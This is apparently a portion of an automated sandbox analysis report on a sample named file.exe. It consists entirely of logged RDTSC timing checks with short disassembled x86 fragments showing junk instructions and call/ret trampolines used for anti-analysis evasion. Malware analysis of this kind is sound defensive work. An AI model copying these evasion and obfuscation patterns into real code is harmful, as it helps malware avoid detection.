            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2361C6 second address: 2361E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 237728 second address: 237773 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FE9F881B0B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jne 00007FE9F881B0C2h 0x00000015 nop 0x00000016 sub dword ptr [ebp+122D20BEh], ecx 0x0000001c push 00000000h 0x0000001e mov di, C450h 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+124609CFh], edx 0x0000002a xchg eax, ebx 0x0000002b pushad 0x0000002c jmp 00007FE9F881B0BFh 0x00000031 push eax 0x00000032 push edx 0x00000033 push edi 0x00000034 pop edi 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B665 second address: 23B66B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B66B second address: 23B702 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE9F881B0B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FE9F881B0B8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 sub dword ptr [ebp+1246CC2Fh], ecx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FE9F881B0B8h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov bx, di 0x0000004a push 00000000h 0x0000004c push 00000000h 0x0000004e push ebx 0x0000004f call 00007FE9F881B0B8h 0x00000054 pop ebx 0x00000055 mov dword ptr [esp+04h], ebx 0x00000059 add dword ptr [esp+04h], 00000014h 0x00000061 inc ebx 0x00000062 push ebx 0x00000063 ret 0x00000064 pop ebx 0x00000065 ret 0x00000066 or dword ptr [ebp+12475034h], esi 0x0000006c xchg eax, esi 0x0000006d push ebx 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FE9F881B0C5h 0x00000075 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B702 second address: 23B71A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b ja 00007FE9F8B69B96h 0x00000011 jns 00007FE9F8B69B96h 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B71A second address: 23B71F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D528 second address: 23D5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007FE9F8B69B98h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000018h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 push 00000000h 0x00000022 and edi, dword ptr [ebp+122D2B84h] 0x00000028 pushad 0x00000029 adc bx, BBC4h 0x0000002e movzx ecx, di 0x00000031 popad 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FE9F8B69B98h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov bx, 5557h 0x00000052 jno 00007FE9F8B69BAEh 0x00000058 xchg eax, esi 0x00000059 js 00007FE9F8B69BA4h 0x0000005f push eax 0x00000060 push edx 0x00000061 push edx 0x00000062 pop edx 0x00000063 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D5AE second address: 23D5B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D5B2 second address: 23D5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FE9F8B69BA5h 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FE9F8B69B96h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E6AD second address: 23E6BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E6BB second address: 23E6F5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE9F8B69BACh 0x00000008 jmp 00007FE9F8B69BA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007FE9F8B69BA5h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E6F5 second address: 23E6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E6FE second address: 23E702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E702 second address: 23E706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23F685 second address: 23F68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23F68B second address: 23F68F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D752 second address: 23D761 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D761 second address: 23D765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D765 second address: 23D76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240684 second address: 240688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240688 second address: 240692 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE9F8B69B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240692 second address: 240697 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 241597 second address: 2415CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FE9F8B69BA2h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jmp 00007FE9F8B69BA6h 0x00000014 pop ebx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2415CA second address: 2415DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9F881B0BFh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24265E second address: 242693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE9F8B69BA5h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242693 second address: 242697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2453FA second address: 245400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243649 second address: 24364D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24462A second address: 2446D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FE9F8B69B98h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 sub bx, 4CBAh 0x00000029 push dword ptr fs:[00000000h] 0x00000030 jmp 00007FE9F8B69BA4h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c mov ebx, eax 0x0000003e mov eax, dword ptr [ebp+122D0731h] 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007FE9F8B69B98h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 0000001Ch 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e mov edi, edx 0x00000060 add ebx, dword ptr [ebp+122D3B37h] 0x00000066 push FFFFFFFFh 0x00000068 xor dword ptr [ebp+122D2657h], eax 0x0000006e nop 0x0000006f jo 00007FE9F8B69BB4h 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007FE9F8B69BA6h 0x0000007c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 245400 second address: 245404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 245404 second address: 245472 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE9F8B69B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f adc di, 7A31h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FE9F8B69B98h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 xor bx, 8B4Fh 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007FE9F8B69B98h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000017h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 mov di, ax 0x00000054 push ebx 0x00000055 jnl 00007FE9F8B69B99h 0x0000005b pop edi 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2436E6 second address: 2436EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 245472 second address: 245476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 245476 second address: 24547C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24547C second address: 24549D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69B9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE9F8B69B9Ch 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24655E second address: 246564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24B37D second address: 24B3A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9F8B69BA2h 0x00000008 jmp 00007FE9F8B69B9Fh 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 249519 second address: 24951E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25313D second address: 25315B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9F8B69B9Ah 0x00000009 jmp 00007FE9F8B69BA0h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25315B second address: 253185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C4h 0x00000007 jnp 00007FE9F881B0B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jg 00007FE9F881B0B6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2532CC second address: 2532D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253546 second address: 25354E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25354E second address: 25355D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25C662 second address: 25C667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26028A second address: 26028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26028E second address: 2602B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FE9F881B0C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 260A30 second address: 260A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 260A35 second address: 260A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE9F881B0B6h 0x0000000a jmp 00007FE9F881B0BCh 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 260A4B second address: 260A5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69B9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 260A5D second address: 260A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 js 00007FE9F881B0BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 260E91 second address: 260E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26101C second address: 261020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 261470 second address: 261477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 261477 second address: 26149D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jng 00007FE9F881B0B6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007FE9F881B0C5h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26149D second address: 2614C8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE9F8B69B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FE9F8B69BADh 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FE9F8B69BA5h 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2614C8 second address: 2614CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2614CE second address: 2614D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26703E second address: 267042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267042 second address: 267050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69B9Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267050 second address: 26705A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 265C25 second address: 265C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 265C2B second address: 265C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 266710 second address: 266732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE9F8B69B96h 0x0000000a pushad 0x0000000b jmp 00007FE9F8B69B9Ah 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jnp 00007FE9F8B69B9Eh 0x00000019 push esi 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 266A3F second address: 266A66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9F881B0C1h 0x00000008 jmp 00007FE9F881B0C1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 266A66 second address: 266A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FE9F8B69B9Ah 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 266A80 second address: 266A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 266A86 second address: 266A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 266A93 second address: 266A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 214D4E second address: 214D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FE9F8B69BA8h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE9F8B69BA5h 0x00000012 pushad 0x00000013 jno 00007FE9F8B69B96h 0x00000019 jng 00007FE9F8B69B96h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 214D93 second address: 214D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 214D99 second address: 214D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6B24 second address: 1F6B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6B2C second address: 1F6B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FE9F8B69B9Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d jmp 00007FE9F8B69BA5h 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 265793 second address: 265799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 265799 second address: 2657B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jg 00007FE9F8B69B9Ah 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 jg 00007FE9F8B69B96h 0x00000016 pop eax 0x00000017 jo 00007FE9F8B69BA2h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26BB91 second address: 26BB97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 230DA0 second address: 230DF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 7AC320AFh 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FE9F8B69B98h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007FE9F8B69BA5h 0x0000002e push 684B2BAEh 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FE9F8B69B9Eh 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 230DF8 second address: 230DFD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 230F00 second address: 230F0D instructions: 0x00000000 rdtsc 0x00000002 je 00007FE9F8B69B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2319BD second address: 2319C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B03D second address: 26B041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B041 second address: 26B047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B047 second address: 26B04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
